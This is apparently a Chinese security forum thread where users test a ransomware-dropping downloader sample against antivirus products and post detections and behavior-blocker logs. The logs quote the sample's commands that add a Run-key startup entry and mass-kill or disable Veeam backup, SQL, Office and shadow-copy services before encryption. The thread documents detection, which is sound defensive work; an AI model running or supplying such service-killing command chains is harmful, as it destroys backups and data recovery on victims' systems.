Downloader -> Ransomware 1X

显示全部楼层 · 发表于 2023-9-15 18:13:19

BDTS 防毒

檔案 C:\病毒\Downloader\Cjttb.exe 已感染 Gen:Suspicious.Cloud.2.zm0@a0S8U3f 並移至隔離區

显示全部楼层 · 发表于 2023-9-15 18:24:50

sep eset kill

显示全部楼层 · 发表于 2023-9-15 18:29:43

McAfee
ti!806A71D1D114

显示全部楼层 · 发表于 2023-9-15 18:30:05

KIS 启发式分析

显示全部楼层 · 发表于 2023-9-15 18:35:07

avast kill

显示全部楼层 · 发表于 2023-9-15 18:50:01

显示全部楼层 · 发表于 2023-9-15 19:19:40

毛豆主防殺

显示全部楼层 · 发表于 2023-9-15 20:23:46

本帖最后由 sanhu35 于 2023-9-15 21:19 编辑

等了几分钟。恶意的脚本行为很多

冰盾拦截事件：

行为: 创建进程
拦截规则: [结束]脚本攻击(执行)
响应动作: 询问（允许）
拦截时间: 2023-09-15 20:20:29
拦截次数: 1
进程名称: cmd.exe
进程路径: C:\Windows\SysWOW64\cmd.exe
进程命令行: C:\Windows\system32\cmd.exe /c ""C:\Users\Administrator\AppData\Local\Temp\killerrr.bat" "
操作目标: C:\Windows\SysWOW64\cmd.exe

行为: 创建进程
拦截规则: [禁止]黑名单启动
响应动作: 询问（允许）
拦截时间: 2023-09-15 20:20:49
拦截次数: 1
进程名称: Cjttb.exe
进程路径: C:\Users\Administrator\Desktop\Downloader\Cjttb.exe
进程命令行: "C:\Users\Administrator\Desktop\Downloader\Cjttb.exe"
操作目标: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

行为: 设置注册表值
拦截规则: 智能防护(添加开机启动)
响应动作: 询问（拦截）
拦截时间: 2023-09-15 20:20:53
拦截次数: 1
进程名称: Cjttb.exe
进程路径: C:\Users\Administrator\Desktop\Downloader\Cjttb.exe
进程命令行: "C:\Users\Administrator\Desktop\Downloader\Cjttb.exe"
操作目标: HKEY_USERS\S-1-5-21-1483919265-625996483-2981065774-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Run|Wzlsmxks=C:\Users\Administrator\AppData\Roaming\Wzlsmxks.exe

行为: 创建进程
拦截规则: [结束]脚本攻击(执行)
响应动作: 询问（拦截）
拦截时间: 2023-09-15 20:22:13
拦截次数: 1
进程名称: cmd.exe
进程路径: C:\Windows\SysWOW64\cmd.exe
进程命令行: cmd  /c "color b & taskkill /F /IM Veeam.Backup.Agent.ConfigurationService.exe & taskkill /F /IM Veeam.Backup.BrokerService.exe & taskkill /F /IM Veeam.Backup.CatalogDataService.exe & taskkill /F /IM Veeam.Backup.CloudService.exe & taskkill /F /IM Veeam.Backup.Manager.exe & taskkill /F /IM Veeam.Backup.MountService.exe & taskkill /F /IM Veeam.Backup.Service.exe & taskkill /F /IM Veeam.Backup.WmiServer.exe & taskkill /F /IM Veeam.Guest.Interaction.Proxy.exe & taskkill /F /IM VeeamDeploymentSvc.exe & taskkill /F /IM VeeamNFSSvc.exe & taskkill /F /IM VeeamTransportSvc.exe & taskkill /F /IM sqlbrowser.exe & taskkill /F /IM sqlceip.exe & taskkill /F /IM sqlservr.exe & taskkill /F /IM sqlwriter.exe & taskkill /F /IM sqlagentc.exe & taskkill /F /IM ReportingServicesService.exe & taskkill /F /IM Ssms.exe & taskkill /F /IM fdhost.exe & taskkill /F /IM fdlauncher.exe & taskkill /F /IM MsDtsSrvr.exe & taskkill /F /IM msmdsrv.exe & taskkill /F /IM mysql.exe & taskkill /F /IM mysqld.exe & taskkill /F /IM w3wp.exe & taskkill /F /IM wsusservice.exe & taskkill /F /IM SageCSClient.exe & taskkill /F /IM UFSoft.U8.OC.QuartzScheduler.exe & taskkill /F /IM Launchpad.exe & taskkill /F /IM dbsrv12.exe & taskkill /F /IM EXCEL.EXE & taskkill /F /IM OUTLOOK.EXE & taskkill /F /IM WINWORD.EXE & taskkill /F /IM OneDrive.exe & taskkill /F /IM TaskService.exe"
操作目标: C:\Windows\SysWOW64\taskkill.exe

行为: 创建进程
拦截规则: [禁止]黑名单启动
响应动作: 询问（拦截）
拦截时间: 2023-09-15 20:22:17
拦截次数: 1
进程名称: Cjttb.exe
进程路径: C:\Users\Administrator\Desktop\Downloader\Cjttb.exe
进程命令行: "C:\Users\Administrator\Desktop\Downloader\Cjttb.exe"
操作目标: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

行为: 创建进程
拦截规则: [结束]脚本攻击(执行)
响应动作: 询问（拦截）
拦截时间: 2023-09-15 20:22:09
拦截次数: 1
进程名称: cmd.exe
进程路径: C:\Windows\SysWOW64\cmd.exe
进程命令行: cmd  /c "color b & net stop "SQLSERVERAGENT" & net stop "SQLBrowser" & net stop "SQLTELEMETRY" & net stop "MsDtsServer130" & net stop "SSISTELEMETRY130" & net stop "SQLWrite" & net stop "MSSQL$VEEAMSQL2012" & net stop "SQLAgent$VEEAMSQL2012" & net stop "MSSQL" & net stop "SQLAgent" & net stop "MSSQLServerADHelper100" & net stop "MSSQLServerOLAPService" & net stop "MsDtsServer100" & net stop "ReportServer" & net stop "SQLTELEMETRY$HL" & net stop "TMBMServer" & net stop "MSSQL$PROGID" & net stop "MSSQL$WOLTERSKLUWER" & net stop "SQLAgent$PROGID" & net stop "SQLAgent$WOLTERSKLUWER" & net stop "MSSQLFDLauncher$OPTIMA" & net stop "MSSQL$OPTIMA" & net stop "SQLAgent$OPTIMA" & net stop "ReportServer$OPTIMA" & net stop "msftesql$SQLEXPRESS" & net stop "postgresql-x64-9.4" & sc config "MSSQLFDLauncher" start= disabled & sc config "SQLSERVERAGENT" start= disabled & sc config "SQLBrowser" start= disabled"
操作目标: C:\Windows\SysWOW64\net.exe

行为: 创建进程
拦截规则: [结束]脚本攻击(执行)
响应动作: 询问（拦截）
拦截时间: 2023-09-15 20:22:07
拦截次数: 1
进程名称: cmd.exe
进程路径: C:\Windows\SysWOW64\cmd.exe
进程命令行: cmd  /c "color b & sc config MSSQLSERVER start=disabled & sc config "SQL Server (MSSQLSERVER)" start=disabled & net stop MSSQL$ & sc config MSSQL$ start=disabled & net stop SQLSERVERAGENT & sc config SQLSERVERAGENT start=disabled & net stop SQLBrowser & sc config SQLBrowser start=disabled & net stop vss & sc config vss start=disabled & net stop SQLWriter & sc config SQLWriter start=disabled & net stop vmvss & sc config vmvss start=disabled & sc config MSSQL$FE_EXPRESS start= disabled & net stop MSSQL$RE_EXPRESS & net stop SQLANYs_Sage_FAS_Fixed_Assets & sc config SQLANYs_Sage_FAS_Fixed_Assets start=disabled & net stop MSSQL$VIM_SQLEXP & sc config MSSQL$VIM_SQLEXP start=disabled & net stop "MSSQLFDLauncher" & net stop "MSSQLSERVER""
操作目标: C:\Windows\SysWOW64\sc.exe

显示全部楼层 · 发表于 2023-9-15 20:30:02

ESET KILL：
时间;扫描程序;对象类型;对象;检测;操作;用户;信息;哈希;此处首次所见
2023/9/15 20:29:13;文件系统实时防护;文件;C:\Users\YY\Downloads\Downloader\Cjttb.exe;MSIL/TrojanDownloader.Agent.OXE 特洛伊木马的变量;已通过删除清除;DESKTOP-VHGCAP2\YY;在通过应用程序创建的新文件上发生了事件: C:\Program Files\7-Zip\7zG.exe (6DAB8C3822A0CAB5B621FD2B7F16AEBB159BCB56).;FC84581FEEA1B0CBEA2577D4195E7EFE7A552180;2023/9/15 20:27:14

[病毒样本] Downloader -> Ransomware 1X

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源